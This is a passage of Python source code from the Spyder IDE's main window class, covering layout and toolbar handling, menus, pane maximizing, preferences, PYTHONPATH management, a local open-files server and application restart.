settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
action = plugin._toggle_view_action
except AttributeError:
# New API
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
self.editor.refresh_formatter_name()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
if not self.completions.closing_plugin(cancelable):
return False
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.completions.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def show_about(self):
"""Show About Spyder dialog box"""
from spyder.widgets.about import AboutDialog
abt = AboutDialog(self)
abt.show()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
@Slot()
def report_issue(self):
"""Report a Spyder issue to github."""
from spyder.widgets.reporterror import SpyderErrorDialog
self._report_dlg = SpyderErrorDialog(self, is_report=True)
self._report_dlg.set_color_scheme(CONF.get('appearance', 'selected'))
self._report_dlg.show()
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
@Slot()
def win_env(self):
"""Show Windows current user environment variables."""
self.dialog_manager.show(WinUserEnvDialog(self))
# --- Kite
def show_kite_installation(self):
"""Show installation dialog for Kite."""
self.completions.get_client('kite').show_installation_dialog()
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage'),
(self.clock_status, 'clock')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
# Update interpreter status widget
if self.interpreter_status:
interpreter = self.maininterpreter.get_interpreter()
self.interpreter_status.update_interpreter(interpreter)
else:
return
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
dlg.setStyleSheet("QTabWidget::tab-bar {"
"alignment: left;}")
self.prefs_dialog_instance = dlg
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
widget = self.completions._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for completion_plugin in self.completions.clients.values():
completion_plugin = completion_plugin['plugin']
widget = completion_plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for plugin in [self.appearance,
self.run,
self.maininterpreter,
self.shortcuts,
self.workingdirectory,
self.editor,
self.projects,
self.ipyconsole,
self.historylog,
self.help,
self.variableexplorer,
self.onlinehelp,
self.explorer,
self.findinfiles] + self.thirdparty_plugins:
if plugin is not None:
# New API
if getattr(plugin, 'CONF_WIDGET_CLASS', None):
try:
widget = self.create_plugin_conf_widget(plugin)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
# Old API
try:
widget = plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
except AttributeError:
pass
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
else:
self.prefs_dialog_instance.show()
self.prefs_dialog_instance.activateWindow()
self.prefs_dialog_instance.raise_()
self.prefs_dialog_instance.setFocus()
def __preference_page_changed(self, index):
"""Preference page index has changed."""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
repo_dir = osp.dirname(spyder_start_directory)
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join([repo_dir])
else:
env['PYTHONPATH'] = ':'.join([repo_dir])
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
delta_top = (self.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# `feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
